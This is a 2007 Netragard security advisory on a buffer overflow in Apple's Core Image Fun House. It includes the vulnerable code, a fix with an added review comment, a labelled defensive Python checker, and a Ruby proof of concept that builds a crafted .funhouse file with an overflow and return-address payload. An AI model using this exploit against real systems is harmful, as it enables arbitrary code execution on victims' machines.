*************************** NETRAGARD ADVISORY ***********************
http://www.netragard.com
"We make IT Safe"
[Advisory Summary]
----------------------------------------------------------------------
Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070628
Product Name : Core Image Fun House
Product Version : <= 2.0 OS X
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Effort (1-10 where 1 == easy) : 5
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 07/10/2007
[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.
[Product Description]
----------------------------------------------------------------------
"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications."
-- http://developer.apple.com/macosx/coreimage.html --
[Technical Summary]
----------------------------------------------------------------------
It is possible to trigger an exploitable buffer overflow condition
by creating a specially crafted .funhouse file.
[Technical Details]
----------------------------------------------------------------------
The Fun House application does not properly validate the XML data it
parses. Specifically, the filename of an image layer read from a
.funhouse file is appended with " center" and copied into a fixed-size
stack buffer without a length check, so a specially crafted .funhouse
file triggers an exploitable buffer overflow condition. The code
responsible for the condition is as follows:
// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
    ...
    NSString *str, *str2, *localizedParameter;
    ...
    else if ([type isEqualToString:@"image"])
    {
        // image effect stack element
        // show an image origin (in its center)
        CGRect r = [[es imageAtIndex:i] extent];
        NSPoint offset = [es offsetAtIndex:i];
        pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
        pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
        str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
        [self drawPoint:pt label:str intoContext:cg];
    }
}
The following code is called by the code referenced above:
/*
    Drawing
*/
// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str intoContext:(CGContextRef)cg
{
    ...
    char cstr[256];
    ...
    if (!movingNow)
    {
        [str getCString:cstr];   // <-- Vulnerability Exists Here (unbounded copy into cstr[256])
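As an added defender-side example (not part of the advisory or of Apple's code), the following Python checks a .funhouse file.xml for image layers whose label, built the way drawPoints: builds it (filename + " center"), would not fit in the 256-byte cstr buffer. The sample plist is constructed here in the layout the PoC uses, and measuring the label in UTF-8 bytes is an assumption about the C-string encoding the copy used.

```python
import plistlib
from xml.sax.saxutils import escape

CSTR_SIZE = 256           # char cstr[256] in drawPoint:label:intoContext:
LABEL_SUFFIX = " center"  # drawPoints: appends this to the layer's filename


def funhouse_label_findings(xml_bytes, buf_size=CSTR_SIZE):
    """Parse a .funhouse file.xml plist and report, per image layer,
    (layer_index, label_bytes, overflows). The label is the layer's
    "file" string plus " center"; it overflows when it plus the
    terminating NUL exceeds buf_size. Byte length is measured in UTF-8
    (assumption: the real copy used the default C-string encoding, so
    non-ASCII filenames may count differently there).
    """
    plist = plistlib.loads(xml_bytes)
    findings = []
    for idx, layer in enumerate(plist.get("layers", [])):
        if not isinstance(layer, dict) or layer.get("type") != "image":
            continue
        label = str(layer.get("file", "")) + LABEL_SUFFIX
        nbytes = len(label.encode("utf-8"))
        findings.append((idx, nbytes, nbytes + 1 > buf_size))
    return findings


def sample_funhouse(filename):
    """Constructed file.xml in the layout of the advisory's PoC (one image
    layer followed by one filter layer); not a real Fun House bundle."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
 "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict><key>layers</key><array>
<dict><key>file</key><string>{escape(filename)}</string>
<key>offsetX</key><real>0.0</real><key>offsetY</key><real>0.0</real>
<key>type</key><string>image</string></dict>
<dict><key>classname</key><string>CIGlassDistortion</string>
<key>type</key><string>filter</string></dict>
</array></dict></plist>
""".encode("utf-8")


if __name__ == "__main__":
    for name in ("flower.jpg", "Z" * 300):
        for idx, nbytes, bad in funhouse_label_findings(sample_funhouse(name)):
            state = "OVERFLOW" if bad else "ok"
            print(f"layer {idx}: label is {nbytes} bytes -> {state}")
```

A 248-character filename is the longest that still fits (255 bytes plus NUL); one character more overflows.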
[Fix]
----------------------------------------------------------------------
To fix the issue, the call [str getCString:cstr]; needs to be replaced
with [str getCString:cstr maxLength:254]; so that at most 254 bytes
(plus the terminating NUL) are written into the 256-byte cstr buffer.
- - [str getCString:cstr];
+ [str getCString:cstr maxLength:254];
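Review bot: the `+` line bounds the copy but silently truncates any label longer than 254 bytes, and `getCString:maxLength:` was deprecated by Apple in Mac OS X 10.4; prefer `getCString:maxLength:encoding:`, which returns NO when the string does not fit (or cannot be converted) so the caller can skip or shorten the label instead of drawing a truncated one, and tie the bound to the buffer rather than a literal, e.g. `[str getCString:cstr maxLength:sizeof(cstr) encoding:NSUTF8StringEncoding]` (for that method maxLength includes the NUL terminator).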
[Proof Of Concept]
----------------------------------------------------------------------
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [email protected]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is not proper UTF-8. The file name for this data
# could be:
#
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fname + ".funhouse/file.xml")
File.unlink(fname + ".funhouse/file.xml")
Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")
FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"
target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
    f.print(FUNSTUFF) # weeeeee... let's have fun.
    f.close
}
[Vendor Status]
----------------------------------------------------------------------
Vendor Notified
[Vendor Comments]
----------------------------------------------------------------------
This issue is addressed in Xcode tools 3.1. Credit to Kevin
Finisterre of Netragard for reporting this issue to Apple. Further
information is available at:
http://support.apple.com/kb/HT1222
[Disclaimer]
----------------------http://www.netragard.com------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.
http://www.netragard.com
[Netragard Whitepaper Downloads]
----------------------------------------------------------------------
Choosing the right provider : http://tinyurl.com/2ahk3j
Three Things you must know : http://tinyurl.com/26pjsn